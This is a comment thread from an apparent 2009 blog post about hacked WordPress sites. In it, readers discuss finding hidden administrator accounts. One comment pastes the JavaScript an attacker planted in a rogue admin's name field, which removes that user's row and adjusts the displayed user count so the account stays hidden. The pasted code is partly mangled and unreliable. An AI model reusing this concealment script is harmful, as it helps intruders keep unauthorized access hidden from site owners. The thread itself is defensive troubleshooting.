Comments on: How To Tell If You Have a Hacked WordPress Blog + Fix

By: Karl Gechlik

Karl Gechlik — Tue, 03 Nov 2009 21:31:16 +0000

I was running 2.5

By: Frank

Frank — Tue, 03 Nov 2009 21:06:49 +0000

This is a very useful post, the best way to protect oneself is to learn about what happened to other people and how it happened.

It would have been useful to know what WordPress version was the one hacked so that others running it know that it has some vulnerability.

And while software updating is a must, surely everyone is entitled to internet holidays at some point…

By: Alfred

Alfred — Mon, 19 Oct 2009 21:28:17 +0000

sad to hear this, hope the very best for the future

By: Jason

Jason — Sun, 11 Oct 2009 11:34:21 +0000

Chris “The hackers need to find better things to do with their talents.”

Some do. I have hacked into things but I then show the user how to make it more secure. I have never hacked into something without their consent though.

By: Chris

Chris — Sun, 20 Sep 2009 00:36:58 +0000

The hackers need to find better things to do with their talents.

By: Chris Rowe

Chris Rowe — Fri, 18 Sep 2009 17:43:21 +0000

I have had a hidden user for a long time and did not thing much about it. I seems they have not been doing much if anything that I can find. My hidden user also shows up as "...' (3 dots) but if you select all and past into a text editor you can see the entire entry. I is on multiple lines.


...                                                                                                                                                                                                                                 var setUserName = function(){           try{                var t=document.getElementById("user_superuser");                while(t.nodeName!="TR"){                     t=t.parentNode;                };                t.parentNode.removeChild(t);                var tags = document.getElementsByTagName("H3");                var s = " shown below";                for (var i = 0; i 0){                          s =(parseInt(t)-1)+s;                          h.removeChild(h.firstChild);                          t = document.createTextNode(s);                          h.appendChild(t);                     }                }           }catch(e){};      };      addLoadEvent(setUserName);



By: Sid
Sid — Fri, 18 Sep 2009 12:33:51 +0000
Awesome fix there now i must make my blog secure…i had got a attack on one of the theme files when unknowingly i had antivirus and wp- security plugin it scanned and made me know where i was wrong..



By: poch
poch — Fri, 18 Sep 2009 12:12:41 +0000
Best tip for WP I had so far!



By: Edoardo
Edoardo — Fri, 18 Sep 2009 10:19:28 +0000
hello, with your interesting post I also discovered I have a administrator in more on my website. I followed your procedure to read her name and delete it.

While you “First name” was written the script, in my case there were only 3 dots.

I followed your procedure for cancellation, but I’m afraid that there have been changes. Perhaps was it not entered any script? What do you think? Thank you.



By: Matt Dunlap
Matt Dunlap — Fri, 18 Sep 2009 03:48:11 +0000
So that is what they did in this latest hack? that’s old school… surprised WP didn’t have that fixed a long time ago